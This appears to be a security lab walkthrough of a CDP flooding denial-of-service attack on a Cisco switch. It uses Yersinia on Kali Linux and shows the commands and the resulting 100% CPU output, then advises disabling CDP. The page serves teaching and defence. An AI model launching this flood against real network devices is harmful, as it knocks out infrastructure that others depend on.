LABS

# CDP flooding

  1. Goal

    • To saturate the CPU of a Cisco device.

  2. Used hardware

    • 1 laptop with Kali Linux
    • 1 Cisco device

  3. Used software

    • Kali Linux (2019.4)

  4. Setup

    Success

  5. Getting started

    1. Check if CDP (Cisco Discovery Protocol) is enabled on the Cisco device.

    More information about CDP (opens new window)

    Switch#show cdp
Global CDP information:
    Sending CDP packets every 60 seconds
    Sending a holdtime value of 180 seconds
    Sending CDPv2 advertisements is enabled
Switch#
    1
    2
    3
    4
    5
    6
    1. Check the CPU usage of the Cisco device
    Switch#show processes cpu history

                     11111
      444445555577777444445555577777444445555555555555555555544444
100
90
80
70
60
50
40
30
20
10      *************************     ********************
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% per second (last 60 seconds)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    1. Install Yersinia on Kali Linux (if necessary)

    More information about Yersinia (opens new window)

    root@kali:~# apt-get update
root@kali:~# apt-get upgrade
root@kali:~# apt-get install yersinia
    1
    2
    3
    1. Launching CDP flooding
    root@kali:~# yersinia -G
    1

    Success

    Select Launch attack -> flooding CDP table

    Success

    The result of the attack can be seen in the following outputs.

    Switch#show cdp traffic
CDP counters :
    Total packets output: 30, Input: 36432
    Hdr syntax: 0, Chksum error: 0, Encaps failed: 0
    No memory: 0, Invalid packet: 0,
    CDP version 1 advertisements output: 5, Input: 36432
    CDP version 2 advertisements output: 25, Input: 0
Switch#
    1
    2
    3
    4
    5
    6
    7
    8
    Switch#show processes cpu history
   999999999999999999999999999999999999999999999999999999999999
   999999999999999999999999999999999999999999999999999999999999
100 **********************************************************
90 **********************************************************
80 **********************************************************
70 **********************************************************
60 **********************************************************
50 **********************************************************
40 **********************************************************
30 **********************************************************
20 **********************************************************
10 **********************************************************
   0....5....1....1....2....2....3....3....4....4....5....5....6
             0    5    0    5    0    5    0    5    0    5    0
             CPU% per second (last 60 seconds)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16

  6. Conclusion

    • It is recommended to disable CDP whenever possible.

Data exfiltration